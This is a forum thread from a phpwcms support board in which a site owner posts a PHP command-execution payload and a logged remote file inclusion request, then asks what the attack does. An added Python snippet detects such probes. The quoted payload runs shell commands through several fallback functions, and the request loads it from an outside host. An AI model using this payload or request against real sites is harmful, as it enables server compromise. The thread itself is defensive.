Possible Attack Code?

sustia
Posts: 651
Joined: Fri 2. Apr 2004, 22:29
Location: Lecce (Italy)

Post by sustia »

Hi, it often happens that I see this kind of code in phpwcms_bad_behavior:

Code:

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Anyway, it seems that nothing happens with my wcms installation, but what kind of attack is it?
What type of damage can it cause?

Code:

request_uri: /index.php?id=http://www.technic-marine-location.com/modules/icontent/include/wysiwyg/id.txt?

http_headers: GET /index.php?id=http://www.technic-marine-location.com/modules/icontent/include/wysiwyg/id.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: noria.ba.cnr.it
User-Agent: libwww-perl/5.807
Campeones del mundo!
Vegetables!
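
Added example (not part of the original thread, and not phpwcms or Bad Behavior code): the logged request passes a remote URL in the `id` parameter, which is the pattern of a remote file inclusion probe, and this Python check flags that pattern in records laid out like the one above. The sample record is constructed with reserved example hosts, and the list of scripted user agents is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in the layout of the log record quoted above
# (hosts replaced with reserved example names).
SAMPLE_RECORD = """\
request_uri: /index.php?id=http://files.example.net/include/id.txt?

http_headers: GET /index.php?id=http://files.example.net/include/id.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.example.org
User-Agent: libwww-perl/5.807
"""

REMOTE_SCHEME = re.compile(r"^(?:https?|ftps?)://", re.IGNORECASE)
SCRIPTED_AGENTS = ("libwww-perl", "lwp-trivial")  # assumption: extend for your logs


def parse_record(text):
    """Split a record into its request_uri and a dict of lower-cased headers."""
    uri, headers = "", {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip().lower(), value.strip()
        if key == "request_uri":
            uri = value
        elif key != "http_headers":  # that line only repeats the request line
            headers[key] = value
    return uri, headers


def rfi_findings(text):
    """Return the reasons why a record looks like a remote file inclusion probe."""
    uri, headers = parse_record(text)
    findings = []
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        if REMOTE_SCHEME.match(value):
            findings.append(f"parameter '{name}' carries a remote URL")
            if value.endswith("?"):  # as in the logged request
                findings.append(f"parameter '{name}' ends with '?'")
    agent = headers.get("user-agent", "").lower()
    if any(agent.startswith(a) for a in SCRIPTED_AGENTS):
        findings.append("scripted client: " + headers["user-agent"])
    return findings
```

An empty list from `rfi_findings` means none of the three indicators matched; it does not show that the request was harmless.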
DeXXus
Posts: 2168
Joined: Fri 28. Nov 2003, 06:20
Location: USA - Florida

Post by DeXXus »

Post by sustia »

Hi DeXXus, what could be the consequences of this attack?

Post by DeXXus »

sustia wrote: Hi DeXXus, what could be the consequences of this attack?

I really do not know. There isn't enough discussion to get a sense, really. Maybe mention it to your host and inquire whether they think you are at risk? Sorry to be of no real insight.

Post by sustia »

Hi, don't worry, thanks anyway.
albu
Posts: 22
Joined: Sat 31. Dec 2005, 18:06
Location: Germany

Post by albu »

Maybe a little "off" the thread, but on my site it wasn't the code. I simply made a mistake when doing the CHMOD after uploading to the server. I didn't check (..yes I know...) and all went well, until 7 days ago, when due to this error my site was hacked! AGAIN: PHPWCMS was not the problem, the man in front of the monitor was the problem (for some hours I was a Mexican bank... phishing attack)